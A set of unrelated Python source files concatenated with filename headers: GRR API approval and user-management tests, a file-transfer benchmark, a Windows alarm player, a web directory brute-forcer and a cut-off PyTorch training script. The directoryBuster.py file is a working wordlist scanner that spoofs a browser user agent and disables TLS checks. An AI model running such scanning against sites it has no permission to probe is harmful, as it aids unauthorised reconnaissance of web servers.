self.config_overrider = test_lib.ConfigOverrider({
"API.DefaultRouter": cls.__name__
})
self.config_overrider.Start()
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.APIACLInit.InitApiAuthManager()
def tearDown(self):
super(ApiClientLibApprovalsTest, self).tearDown()
self.config_overrider.Stop()
def testCreateClientApproval(self):
client_id = self.SetupClients(1)[0]
approval = self.api.Client(client_id.Basename()).CreateApproval(
reason="blah", notified_users=["foo"])
self.assertEqual(approval.client_id, client_id.Basename())
self.assertEqual(approval.data.subject.client_id, client_id.Basename())
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilClientApprovalValid(self):
client_id = self.SetupClients(1)[0]
approval = self.api.Client(client_id.Basename()).CreateApproval(
reason="blah", notified_users=["foo"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.GrantClientApproval(
client_id, self.token.username, reason="blah", approver="foo")
threading.Thread(target=ProcessApproval).start()
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
def testCreateHuntApproval(self):
h = self.CreateHunt()
approval = self.api.Hunt(h.urn.Basename()).CreateApproval(
reason="blah", notified_users=["foo"])
self.assertEqual(approval.hunt_id, h.urn.Basename())
self.assertEqual(approval.data.subject.hunt_id, h.urn.Basename())
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilHuntApprovalValid(self):
h = self.CreateHunt()
approval = self.api.Hunt(h.urn.Basename()).CreateApproval(
reason="blah", notified_users=["approver"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.CreateAdminUser("approver")
approver_token = access_control.ACLToken(username="approver")
security.HuntApprovalGrantor(
subject_urn=h.urn,
reason="blah",
delegate=self.token.username,
token=approver_token).Grant()
threading.Thread(target=ProcessApproval).start()
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
class ApprovalByLabelE2ETest(ApiE2ETest):
def setUp(self):
super(ApprovalByLabelE2ETest, self).setUp()
# Set up clients and labels before we turn on the FullACM. We need to create
# the clients first because checking labels requires the clients to exist.
client_ids = self.SetupClients(3)
self.client_nolabel = rdf_client.ClientURN(client_ids[0])
self.client_nolabel_id = self.client_nolabel.Basename()
self.client_legal = rdf_client.ClientURN(client_ids[1])
self.client_legal_id = self.client_legal.Basename()
self.client_prod = rdf_client.ClientURN(client_ids[2])
self.client_prod_id = self.client_prod.Basename()
with aff4.FACTORY.Open(
self.client_legal,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabel("legal_approval")
with aff4.FACTORY.Open(
self.client_prod,
aff4_type=aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client_obj:
client_obj.AddLabels(["legal_approval", "prod_admin_approval"])
cls = (api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks)
cls.ClearCache()
self.approver = test_lib.ConfigOverrider({
"API.DefaultRouter":
cls.__name__,
"ACL.approvers_config_file":
os.path.join(self.base_path, "approvers.yaml")
})
self.approver.Start()
# Get a fresh approval manager object and reload with test approvers.
self.approval_manager_stubber = utils.Stubber(
client_approval_auth, "CLIENT_APPROVAL_AUTH_MGR",
client_approval_auth.ClientApprovalAuthorizationManager())
self.approval_manager_stubber.Start()
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.APIACLInit.InitApiAuthManager()
def tearDown(self):
super(ApprovalByLabelE2ETest, self).tearDown()
self.approval_manager_stubber.Stop()
self.approver.Stop()
def testClientNoLabels(self):
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_nolabel_id).File("fs/os/foo").Get)
# approvers.yaml rules don't get checked because this client has no
# labels. Regular approvals still required.
self.RequestAndGrantClientApproval(self.client_nolabel, self.token)
# Check we now have access
self.api.Client(self.client_nolabel_id).File("fs/os/foo").Get()
def testClientApprovalSingleLabel(self):
"""Client requires an approval from a member of "legal_approval"."""
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_legal_id).File("fs/os/foo").Get)
self.RequestAndGrantClientApproval(self.client_legal, self.token)
# This approval isn't enough, we need one from legal, so it should still
# fail.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_legal_id).File("fs/os/foo").Get)
# Grant an approval from a user in the legal_approval list in
# approvers.yaml
self.GrantClientApproval(
self.client_legal,
self.token.username,
reason=self.token.reason,
approver="legal1")
# Check we now have access
self.api.Client(self.client_legal_id).File("fs/os/foo").Get()
def testClientApprovalMultiLabel(self):
"""Multi-label client approval test.
This client requires one legal and two prod admin approvals. The requester
must also be in the prod admin group.
"""
self.token.username = "prod1"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
# No approvals yet, this should fail.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
self.RequestAndGrantClientApproval(self.client_prod, self.token)
# This approval from "approver" isn't enough.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
# Grant an approval from a user in the legal_approval list in
# approvers.yaml
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="legal1")
# We have "approver", "legal1": not enough.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
# Grant an approval from a user in the prod_admin_approval list in
# approvers.yaml
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod2")
# We have "approver", "legal1", "prod2": not enough.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod3")
# We have "approver", "legal1", "prod2", "prod3": we should have
# access.
self.api.Client(self.client_prod_id).File("fs/os/foo").Get()
def testClientApprovalMultiLabelCheckRequester(self):
"""Requester must be listed as prod_admin_approval in approvals.yaml."""
# No approvals yet, this should fail.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
# Grant all the necessary approvals
self.RequestAndGrantClientApproval(self.client_prod, self.token)
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="legal1")
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod2")
self.GrantClientApproval(
self.client_prod,
self.token.username,
reason=self.token.reason,
approver="prod3")
# We have "approver", "legal1", "prod2", "prod3" approvals but because
# "notprod" user isn't in prod_admin_approval and
# requester_must_be_authorized is True it should still fail. This user can
# never get a complete approval.
self.assertRaises(grr_api_errors.AccessForbiddenError,
self.api.Client(
self.client_prod_id).File("fs/os/foo").Get)
class RootApiUserManagementTest(ApiE2ETest):
"""E2E test for root API user management calls."""
def setUp(self):
super(RootApiUserManagementTest, self).setUp()
self.config_overrider = test_lib.ConfigOverrider({
"API.DefaultRouter": api_root_router.ApiRootRouter.__name__
})
self.config_overrider.Start()
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.APIACLInit.InitApiAuthManager()
def tearDown(self):
super(RootApiUserManagementTest, self).tearDown()
self.config_overrider.Stop()
def testStandardUserIsCorrectlyAdded(self):
user = self.api.root.CreateGrrUser(username="user_foo")
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.username, "user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
def testAdminUserIsCorrectlyAdded(self):
user = self.api.root.CreateGrrUser(
username="user_foo", user_type=grr_api_root.GrrUser.USER_TYPE_ADMIN)
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.username, "user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_ADMIN)
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertIsNone(user_obj.Get(user_obj.Schema.PASSWORD))
def testStandardUserWithPasswordIsCorrectlyAdded(self):
user = self.api.root.CreateGrrUser(username="user_foo", password="blah")
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.username, "user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertTrue(
user_obj.Get(user_obj.Schema.PASSWORD).CheckPassword("blah"))
def testUserModificationWorksCorrectly(self):
user = self.api.root.CreateGrrUser(username="user_foo")
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
user = user.Modify(user_type=user.USER_TYPE_ADMIN)
self.assertEqual(user.data.user_type, user.USER_TYPE_ADMIN)
user = user.Modify(user_type=user.USER_TYPE_STANDARD)
self.assertEqual(user.data.user_type, user.USER_TYPE_STANDARD)
def testUserPasswordCanBeModified(self):
user = self.api.root.CreateGrrUser(username="user_foo", password="blah")
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertTrue(
user_obj.Get(user_obj.Schema.PASSWORD).CheckPassword("blah"))
user = user.Modify(password="ohno")
user_obj = aff4.FACTORY.Open("aff4:/users/user_foo", token=self.token)
self.assertTrue(
user_obj.Get(user_obj.Schema.PASSWORD).CheckPassword("ohno"))
def testUsersAreCorrectlyListed(self):
for i in range(10):
self.api.root.CreateGrrUser(username="user_%d" % i)
users = sorted(self.api.root.ListGrrUsers(), key=lambda u: u.username)
self.assertEqual(len(users), 10)
for i, u in enumerate(users):
self.assertEqual(u.username, "user_%d" % i)
self.assertEqual(u.username, u.data.username)
def testUserCanBeFetched(self):
self.api.root.CreateGrrUser(
username="user_foo", user_type=grr_api_root.GrrUser.USER_TYPE_ADMIN)
user = self.api.root.GrrUser("user_foo").Get()
self.assertEqual(user.username, "user_foo")
self.assertEqual(user.data.user_type, grr_api_root.GrrUser.USER_TYPE_ADMIN)
def testUserCanBeDeleted(self):
self.api.root.CreateGrrUser(
username="user_foo", user_type=grr_api_root.GrrUser.USER_TYPE_ADMIN)
user = self.api.root.GrrUser("user_foo").Get()
user.Delete()
with self.assertRaises(grr_api_errors.ResourceNotFoundError):
self.api.root.GrrUser("user_foo").Get()
def main(argv):
del argv # Unused.
unittest.main()
def DistEntry():
"""The main entry point for packages."""
flags.StartMain(main)
if __name__ == "__main__":
flags.StartMain(main)
|
benchmark.py
|
"""
Benchmark performance of file transfer.
Copyright 2022. Andrew Wang.
"""
from typing import Callable
from time import sleep
from threading import Thread
from queue import Queue
from logging import WARNING, basicConfig
import numpy as np
from click import command, option
from send import send
from receive import receive
# pylint: disable=no-value-for-parameter
def queue_wrapper(func: Callable[..., int], que: Queue) \
-> Callable[..., None]:
"""Wrap function and put return value in queue."""
def wrapped(*args, **kwargs):
"""Put return value in queue."""
elapsed = func(*args, **kwargs)
que.put(elapsed)
return wrapped
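# A minimal usage sketch (illustrative only; fake_transfer is a made-up
# stand-in for send/receive): wrap a timing function so threads can hand
# their elapsed times back through a shared Queue.
#
# times: Queue = Queue()
# def fake_transfer() -> int:
# return 123 # elapsed nanoseconds, for example
# Thread(target=queue_wrapper(fake_transfer, times)).start()
# elapsed = times.get()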
@command()
@option('--size', '-s', type=int, required=True,
help='The number of bytes to generate.')
def benchmark(size: int):
"""Benchmark performance of file transfer."""
fname = 'random_bytes'
wait_time = .15
with open(fname, 'wb') as writer:
writer.write(np.random.bytes(size))
print(f'Wrote {fname} file with {size} bytes.')
time_queue: Queue = Queue()
basicConfig(level=WARNING)
print('Executing receiver and sender.')
receiver = Thread(target=queue_wrapper(receive, time_queue))
sender = Thread(target=queue_wrapper(send, time_queue), args=(fname,))
receiver.start()
sleep(wait_time)
sender.start()
for thread in (sender, receiver):
thread.join()
time_one: int = time_queue.get()
time_two: int = time_queue.get()
elapsed = max(time_one, time_two) - 1e9 * wait_time
print(f'Transfer time: {round(elapsed / 1e6)} ms.')
if __name__ == '__main__':
benchmark()
|
player.py
|
# coding=utf-8
'''
"Alarm" player. Can be called repeatedly; repeating the same value has no effect.
The single entry point:
play(wav_filename) loops a wav file (the name must not be 'default')
play('default') plays the Windows beep pattern; the style can be configured in
beep.properties (on Win7 the beeps were sometimes silent even though music
playback worked, which may also be a sound-card issue)
play('') changes nothing
play(None) stops playback
The built-in win32 system sounds can also be used:
'SystemAsterisk' Asterisk
'SystemExclamation' Exclamation
'SystemExit' Exit Windows
'SystemHand' Critical Stop
'SystemQuestion' Question
'SystemDefault'
'''
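# Minimal usage sketch (illustrative; 'alarm.wav' is an assumed file name):
#
# play('alarm.wav') # loop a wav file
# play('default') # loop the configured beep pattern
# play('') # no-op, keep whatever is currently playing
# play(None) # stop playback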
import os
import winsound
from sine.utils import ReStartableThread
from .exception import ClientException
from .globalData import data, useDefault, eManager
_list = []
def _init():
def create_beep(Hz, last):
def __func_beep():
winsound.Beep(Hz, last)
return __func_beep
import time
def create_sleep(last):
def __func_sleep():
time.sleep(last)
return __func_sleep
from .initUtil import warn
from sine.utils.properties import loadSingle, LineReader
# Read the beep pattern configuration
beep_filename = 'beep.properties'
default_pattern = [(600,50),(200,),(600,50),(300,)]
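# Each pattern entry is either a (frequency_hz, duration_ms) pair, played as a
# beep, or a single-element (interval_ms,) tuple, treated as a pause. The
# default above beeps at 600 Hz for 50 ms, pauses 200 ms, beeps again, then
# pauses 300 ms. The beep.properties file is assumed to hold one
# comma-separated entry per line in the same two forms, e.g. "600,50" or "300".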
lines = []
try:
useDefault(data['location'], beep_filename)
with open(beep_filename, 'r', encoding='latin') as file:
for line in LineReader(file):
key, value = loadSingle(line)
lines.append(key + value)
except Exception as e:
warn(u'从文件 %s 读取beep样式失败,将会使用默认值。' % (beep_filename), e)
beep_pattern = default_pattern
try:
if 'beep_pattern' not in locals():
beep_pattern = []
for i, s in enumerate(lines):
array = s.split(',')
if len(array) > 1:
frequency = int(array[0].strip())
if (frequency < 37 or frequency > 32767):
raise ClientException(u'频率必须介于 37 与 32767 之间:', frequency)
duration = int(array[1].strip())
if (duration <= 0):
raise ClientException(u'持续时间必须为正:', duration)
if (duration > 2000):
raise ClientException(u'持续时间过长(大于2000毫秒):', duration)
beep_pattern.append((frequency, duration))
else:
last = int(array[0].strip())
if (last <= 0):
raise ClientException(u'间隔时间必须为正:', last)
beep_pattern.append((last,))
except Exception as e:
warn(u'读取beep样式失败,将会使用默认值。', e)
beep_pattern = default_pattern
for s in beep_pattern:
if len(s) > 1:
_list.append(create_beep(s[0], s[1]))
else:
_list.append(create_sleep(s[0] / 1000.0))
_init()
def _alarm(stop_event):
while 1:
for func in _list:
if stop_event.is_set():
return
func()
return
_name = None # content currently playing (a string); never the empty string ''
_expect = None # desired content remembered while muted
_beep = 'default'
_alarmThread = ReStartableThread(target=_alarm)
def play(name):
'''While muted, remember the desired content and treat the argument as None so that playback stops.'''
global _name, _expect
if not data['sound']:
_expect = name
name = None
if _name == name or name == '':
return
if _name is not None: # if something is playing, stop the current beep or music first
_alarmThread.stop(1)
winsound.PlaySound(None, winsound.SND_PURGE)
if name != None:
if name == _beep:
_alarmThread.start()
else:
# play a wav file, or a system sound
if os.path.isfile(name):
winsound.PlaySound(name, winsound.SND_FILENAME | winsound.SND_ASYNC | winsound.SND_LOOP)
elif os.path.isfile(name + '.wav'):
winsound.PlaySound(name + '.wav', winsound.SND_FILENAME | winsound.SND_ASYNC | winsound.SND_LOOP)
elif name in _extraLegal:
winsound.PlaySound(name, winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP)
_name = name
return
_extraLegal = [
'',
_beep,
'SystemAsterisk',
'SystemExclamation',
'SystemExit',
'SystemHand',
'SystemQuestion',
'SystemDefault']
def isLegal(name):
'''Check that the audio file exists or that the name is one of the legal system values above.'''
if name in _extraLegal:
return True
if os.path.isfile(name):
return True
if os.path.isfile(name + '.wav'):
return True
return False
def assertLegal(name):
if not isLegal(name):
raise ClientException(u'波形文件 \'%s\' 或者 \'%s.wav\' 不存在(也不是系统声音)。' % (name, name))
def _handleSoundChange(*args):
if data['sound']:
play(_expect)
else:
play(None)
eManager.addListener('sound.change', _handleSoundChange)
|
directoryBuster.py
|
import requests
import argparse
import threading
from urllib3.exceptions import InsecureRequestWarning
from collections import deque
from queue import Queue
class DirectoryBuster:
def __init__(self):
super().__init__()
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
self.totalWords = 0
self.initialWords = 0
self.attemptCount = 0
self.directoryThreadsCount = 1
self.wordlist = None
self.foundSubdirectories = deque()
self.threadQueue = Queue()
self.parser = argparse.ArgumentParser()
self.setupArgs()
self.initiateBusting()
def setupArgs(self):
self.parser.add_argument('-dict', help='Dictionary to use')
self.parser.add_argument('-r', help='Be recursive', action='store_true')
self.parser.add_argument('-p', help='Number of parallel directories to bruteforce', default=1)
self.parser.add_argument('-t', help='Number of Threads to bust each directory', default=5)
self.parser.add_argument('-url', help='Url to bust')
self.parser.add_argument('-v', help='Show all url attempts', action='store_true')
args = self.parser.parse_args()
if (args.url is None):
print('Required url argument. Try using -url [url]')
exit()
if (args.dict is None):
print('Required dict argument. Try using -dict [dictionary]')
exit()
def initiateBusting(self):
args = self.parser.parse_args()
try:
with open(args.dict) as dictionary:
words = dictionary.readlines()
self.wordlist = words
threadLimit = int(args.t)
self.initialWords = len(words)
blockSize = self.initialWords // threadLimit
self.totalWords = self.initialWords
self.foundSubdirectories.append('/')
print('====================================')
if (not args.v):
print('Links found:')
else:
print('Links attempted:')
print('====================================')
args.url = args.url.strip()
subdirectory = self.foundSubdirectories.popleft()
self.directoryThread(words, args, subdirectory, threadLimit, blockSize)
while not self.threadQueue.empty():
self.threadQueue.get().join()
except KeyboardInterrupt:
print('\n\033[93mProgram terminated by user!')
exit()
except FileNotFoundError:
print('\033[93mDictionary file not found!')
exit()
def directoryThread(self, words, args, subdirectory, threadLimit, blockSize):
for threadNumber in range(threadLimit - 1):
lowerBound = threadNumber * blockSize
upperBound = (threadNumber + 1) * blockSize # slice end is exclusive, so no -1, otherwise each block's last word is skipped
bustingThread = threading.Thread(target=self.bustingThread, args=(words[lowerBound:upperBound], args, subdirectory, False, threadLimit, blockSize))
bustingThread.daemon = True
bustingThread.start()
self.threadQueue.put(bustingThread)
bustingThread = threading.Thread(target=self.bustingThread, args=(words[(threadLimit-1)*blockSize:], args, subdirectory, True, threadLimit, blockSize))
bustingThread.daemon = True
bustingThread.start()
self.threadQueue.put(bustingThread)
def bustingThread(self, words, args, subdirectory, isLastThread, threadLimit, blockSize):
for link in words:
if (link.startswith('#')):
continue
self.attemptCount += 1
link = link.strip()
print('\u001b[37m{}/{}'.format(self.attemptCount, self.totalWords), end='\r')
dest = args.url + subdirectory + link
resp = requests.head(dest, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0'}, verify=False)
if (resp.status_code < 400 or resp.status_code >= 500):
if (resp.status_code >= 200 and resp.status_code < 300 and link != ''):
print('\033[92m{} (status code: {})'.format(dest, resp.status_code))
else:
print('\033[93m{} (status code: {})'.format(dest, resp.status_code))
if (link != '' and args.r):
newSubdirectory = '/{}/'.format(link)
if (self.directoryThreadsCount < int(args.p)):
self.directoryThreadsCount += 1
directoryThread = threading.Thread(target=self.directoryThread, args=(self.wordlist, args, newSubdirectory, threadLimit, blockSize))
directoryThread.daemon = True
directoryThread.start()
self.threadQueue.put(directoryThread)
else:
self.foundSubdirectories.append(newSubdirectory)
self.totalWords += self.initialWords
elif(args.v):
print('\033[91m{} (status code: {})'.format(dest, resp.status_code))
if (self.foundSubdirectories):
if (isLastThread):
nextSubdirectory = self.foundSubdirectories.pop()
else:
nextSubdirectory = self.foundSubdirectories[0]
self.bustingThread(words, args, nextSubdirectory, isLastThread, threadLimit, blockSize)
DirectoryBuster()
|
training.py
|
import torch
torch.manual_seed(0)
from torch import nn
import torch.multiprocessing as mp
import torch.utils.data
from torch.autograd import Variable
import numpy as np
from os import path
import os
from model import FCNSG,LRSG
from dataset import get_dataset
import pdb
import argparse
import time
from os.path import dirname, abspath, join
import glob
cur_dir = dirname(abspath(__file__))
parser = argparse.ArgumentParser()
# Note: argparse's type=bool treats any non-empty string (including "False") as True, hence the explicit parser below.
parser.add_argument('--async', action="store", dest="asyn", type=lambda s: s.lower() in ("true", "1", "yes"), default=False,
help="Type True/False to turn on/off the async SGD. Default False")
parser.add_argument("--process", action="store", dest="process", type=int, default=4,
help="Number of processes to use if asynchronous SGD is turned on. Default 4")
parser.add_argument('--MH', action="store_true", default=False,
help="to use MinHash/feature hashing files as input. Default False")
parser.add_argument('--K', action="store", dest="K", type=int, default=1000,
help="K minhashes to use. The corresponding minhash file should be generated already. Default 1000")
parser.add_argument('--L', action="store", dest="L", type=int, default=3,
help="L layers of fully connected neural network to use. Default 3")
parser.add_argument('--dataset', action="store", dest="dataset", default="url",
help="Dataset folder to use. Default url")
parser.add_argument('--epoch', action="store", dest="epoch", type=int, default=10,
help="Number of epochs for training. Default 10")
parser.add_argument('--batch', action="store", dest="batch_size", type=int, default=1024,
help="Batch size to use. Default 1024")
parser.add_argument('--hidden', action="store", dest="hidden", type=int, default=1000,
help="hidden")
parser.add_argument('--reduced_dimension', action="store", dest="reduced_dimension", type=int, default=10000,
help="Dimension reduction by FH or MH")
parser.add_argument('--bbits', action="store", dest="bbits", type=int, default=8,
help="number of bits to store for MH")
parser.add_argument('--pairwise', action="store_true", default=False,
help="to use pairwise data / simple data. Default False")
parser.add_argument('--hashfull', action="store_true", default=False,
help="hashfull empty bins in DMH. Default False")
parser.add_argument('--use_mh_computation', action="store", default="univ",
help="univ: vectorised 4 universal, rotdense : rotation densified, orig: original")
parser.add_argument('--device', action="store", dest="device", type=int, default=0,
help="ID of GPU")
parser.add_argument('--lr', action="store", dest="lr", type=float, default=0.0001,
help="Learning rate")
parser.add_argument('--use_classwts', action="store_true", default=False,
help="Use class weights if available")
parser.add_argument('--weight_decay', action="store", dest="weight_decay", type=float, default=0,
help="L2 penalty. Default 0")
parser.add_argument('--save_model_itr', action="store", dest="save_model_iteration", type=int, default=1000000,
help="Interval (in iterations) at which the model checkpoint is saved")
parser.add_argument('--eval_model_itr', action="store", dest="eval_model_iteration", type=int, default=1000000,
help="Interval (in iterations) at which the model is evaluated")
parser.add_argument('--load_latest_ckpt', action="store_true", default=False,
help="load latest ckpt")
results = parser.parse_args()
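# Example invocation (illustrative; assumes the <dataset>/data/ and
# <dataset>/record/ directory layout used below):
# python training.py --dataset url --MH --K 1000 --L 3 --epoch 10 \
# --batch 1024 --hidden 1000 --reduced_dimension 10000 --device 0 --lr 0.0001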
# ===========================================================
# Global variables & Hyper-parameters
# ===========================================================
DATASET = results.dataset
ASYNC = results.asyn
PROCESS = results.process
MH = results.MH
D = results.reduced_dimension
K = results.K
bbits = results.bbits
L = results.L
EPOCH = results.epoch
BATCH_SIZE = results.batch_size
GPU_IN_USE = True # whether using GPU
PAIRWISE = results.pairwise
device_id = results.device
HASHFULL = results.hashfull
MHCOMPUTATION = results.use_mh_computation
LRATE = results.lr
USECLASSWT = results.use_classwts
WEIGHT_DECAY = results.weight_decay
SAVE_MODEL_ITERATION = results.save_model_iteration
LOAD_LATEST_CKPT = results.load_latest_ckpt
EVALUATE_ITR = results.eval_model_iteration
class_weights = None
HID=results.hidden
if USECLASSWT:
if DATASET == "avazu":
class_weights = torch.tensor([0.566, 4.266], dtype=torch.double)
print(DATASET, ": Using class weights", class_weights)
def train(data_files, dim, model, MHTrain, time_file=None, record_files=None, p_id=None):
# ===========================================================
# Prepare train dataset & test dataset
# ===========================================================
print("***** prepare data ******")
train, train_small, test, test_small = data_files
if record_files is not None:
acc_name, valacc_name, loss_name, valloss_name,final_prediction_name,checkpoint_name,index_name = record_files
training_set = get_dataset(train, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
train_dataloader = torch.utils.data.DataLoader(dataset=training_set, batch_size=BATCH_SIZE, shuffle=True)
validation_set = get_dataset(test, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
validation_dataloader = torch.utils.data.DataLoader(dataset=validation_set, batch_size=BATCH_SIZE, shuffle=False)
training_set_small = get_dataset(train_small, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
train_dataloader_small = torch.utils.data.DataLoader(dataset=training_set_small, batch_size=BATCH_SIZE, shuffle=True)
validation_set_small = get_dataset(test_small, dim, MHTrain, K, PAIRWISE, HASHFULL, MHCOMPUTATION)
validation_dataloader_small = torch.utils.data.DataLoader(dataset=validation_set_small, batch_size=BATCH_SIZE, shuffle=False)
print("***** prepare optimizer ******")
optimizer = torch.optim.Adam(model.parameters(), lr=LRATE, weight_decay=WEIGHT_DECAY)
#scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.1)
loss_func = nn.BCELoss(weight=class_weights).cuda(device_id) if GPU_IN_USE else nn.BCELoss(weight=class_weights)
plain_loss_func = nn.BCELoss().cuda(device_id) if GPU_IN_USE else nn.BCELoss()
epoch = 0
if LOAD_LATEST_CKPT :
files=glob.glob(checkpoint_name + "*")
if len(files) > 0:
files.sort(key=path.getmtime)
lcheckpoint_name = files[-1]
print("Loading from checkpoint", lcheckpoint_name)
checkpoint = torch.load(lcheckpoint_name)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
epoch = checkpoint['epoch']
print("Epoch:",epoch)
print("Iteration:", checkpoint["iteration"])
else:
print("CHECKPOINT NOT FOUND")
return
else:
# clear record files
for f in record_files:
if path.isfile(f):
print("removing",f)
os.remove(f)
print("***** Train ******")
acc_list, valacc_list = [], []
loss_list, valloss_list = [], []
index_list = []
training_time = 0.
while epoch < EPOCH :
# Training
for iteration, (x, y) in enumerate(train_dataloader):
if iteration % SAVE_MODEL_ITERATION == 0 and iteration > 0:
torch.save({
'epoch': epoch,
'iteration': iteration,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, checkpoint_name + ".latest")
if (epoch == 0 and iteration in [0] + [40*2**i for i in range(0, 25)]) or (epoch > 0 and iteration % EVALUATE_ITR == 0): # epoch 0: evaluate at exponentially spaced iterations; later epochs: evaluate every EVALUATE_ITR iterations
index_list.append(np.array([epoch, iteration], dtype=int))
train_acc, train_loss = validation(model, train_dataloader_small, plain_loss_func, full=True)
acc_list.append(train_acc)
loss_list.append(train_loss.data)
print("*" * 50)
print('## Epoch: ', epoch, '| Iteration: ', iteration, '| total train loss: %.4f' % train_loss.data,
'| total train accuracy: %.2f' % train_acc)
valid_acc, valid_loss = validation(model, validation_dataloader, plain_loss_func, full=True, prediction_file=final_prediction_name+"_E"+str(epoch)+"_IT"+str(iteration), write=True)
valacc_list.append(valid_acc)
valloss_list.append(valid_loss)
print('## Epoch: ', epoch, '| Iteration: ', iteration, '| total validation loss: %.4f' % valid_loss,
'| total validation accuracy: %.2f' % valid_acc)
print("*" * 50)
if record_files is not None:
with open(acc_name, "ab") as f_acc_name, open(valacc_name, "ab") as f_valacc_name, open(loss_name, "ab") \
as f_loss_name, open(valloss_name, "ab") as f_valloss_name, open(index_name, "ab") as f_index_name:
np.savetxt(f_acc_name, acc_list)
np.savetxt(f_valacc_name, valacc_list)
np.savetxt(f_loss_name, loss_list)
np.savetxt(f_valloss_name, valloss_list)
np.savetxt(f_index_name, index_list, fmt="%d")
f_acc_name.close()
f_valacc_name.close()
f_loss_name.close()
f_valloss_name.close()
f_index_name.close()
acc_list = []
valacc_list = []
loss_list = []
valloss_list = []
index_list = []
start = time.perf_counter() # time.clock() is deprecated and was removed in Python 3.8
model.train()
x = Variable(x).cuda(device_id) if GPU_IN_USE else Variable(x)
y = Variable(y).cuda(device_id) if GPU_IN_USE else Variable(y)
y = y.double()
output = model(x)
y = y.reshape(output.shape[0], 1)
loss = loss_func(output, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
training_time += time.perf_counter() - start
predicted = output.data > 0.5
train_accuracy = (predicted == y.data.bool()).sum().item() / y.data.shape[0]
if iteration % 100 == 0:
print('Epoch: ', epoch, '| Iteration: ', iteration, '| batch train loss: %.4f' % loss.data,
'| batch train accuracy: %.2f' % train_accuracy)
#scheduler.step()
# Saving records
epoch = epoch + 1
torch.save({
'epoch': epoch,
'iteration': 0,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
}, checkpoint_name + ".latest")
valid_acc, valid_loss = validation(model, validation_dataloader, plain_loss_func, full=True, prediction_file=final_prediction_name+"_E"+str(epoch)+"_IT0", write=True)
print('Final validation loss: %.4f' % valid_loss,
'| final validation accuracy: %.2f' % valid_acc)
valacc_list.append(valid_acc)
valloss_list.append(valid_loss)
index_list.append(np.array([epoch, 0], dtype=int))
with open(acc_name, "ab") as f_acc_name, open(valacc_name, "ab") as f_valacc_name, open(loss_name, "ab") \
as f_loss_name, open(valloss_name, "ab") as f_valloss_name, open(index_name, "ab") as f_index_name:
np.savetxt(f_acc_name, acc_list)
np.savetxt(f_valacc_name, valacc_list)
np.savetxt(f_loss_name, loss_list)
np.savetxt(f_valloss_name, valloss_list)
np.savetxt(f_index_name, index_list, fmt="%d")
f_acc_name.close()
f_valacc_name.close()
f_loss_name.close()
f_valloss_name.close()
f_index_name.close()
acc_list = []
valacc_list = []
loss_list = []
valloss_list = []
index_list = []
if time_file is not None:
with open(time_file, 'a+') as outfile:
prefix = "(ASYNC, id={}) ".format(p_id) if ASYNC else ""
if MH:
outfile.write("{}K={}, L={}, epoch={} | time={}\n".format(prefix, K, L, EPOCH, training_time))
else:
outfile.write("{}Baseline, L={}, epoch={} | time={}\n".format(prefix, L, EPOCH, training_time))
def validation(model, validation_dataloader, plain_loss_func, full=False, prediction_file=None, write=False):
count = 0
